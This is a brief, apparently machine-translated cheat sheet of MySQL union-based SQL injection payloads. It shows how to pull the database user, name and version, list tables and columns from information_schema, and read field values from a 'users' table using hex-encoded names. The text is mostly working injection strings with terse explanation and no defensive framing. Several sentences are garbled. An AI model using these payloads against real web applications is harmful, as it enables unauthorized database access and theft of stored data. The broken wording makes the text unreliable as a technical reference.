MYSQL injection statements are only applicable to the statement type. Order by XXUnion select ..... 1 'Union SELECT 1, CONCAT (user (), 0x3a, database (), 0x3a, version () # The two statements are equivalent. 1 'Union SELECT 1, CONCAT_WS (CHAR (58), user (), database (), version () # The above is character type, and the annotator is #, CONCAT_WS is a character separated by a separator. Obtain information such as database 1 'Union SELECT 1, concat (table_name) from information_schema.tables where table_schema = database () # concat is generated only for string connection and can be used without any need, you can also output all tables. Table_name and table_schema are fields in the tables Table in information_schema. 1 'Union SELECT 1, concat (column_name) from information_schema.columns where table_name = 0x7573657273 #0x7573657273 is the hexadecimal representation of users. This users is just a special case. Query Based on the field values in the table obtained above. Here, the database knows, the table knows, and the table field knows. The rest will not be checked. Perform union query directly. Table tables in information_schema contains table _schema (Database Name) and table_name (Table Name). Table columns in information_schema contains table_name (table name) and column_name (column name) it doesn't matter if only one of the two fields can be displayed even if order by is obtained. You can use concat such as concat (field, 0x3a, field) to display the two fields. The one in the middle is: hexadecimal representation.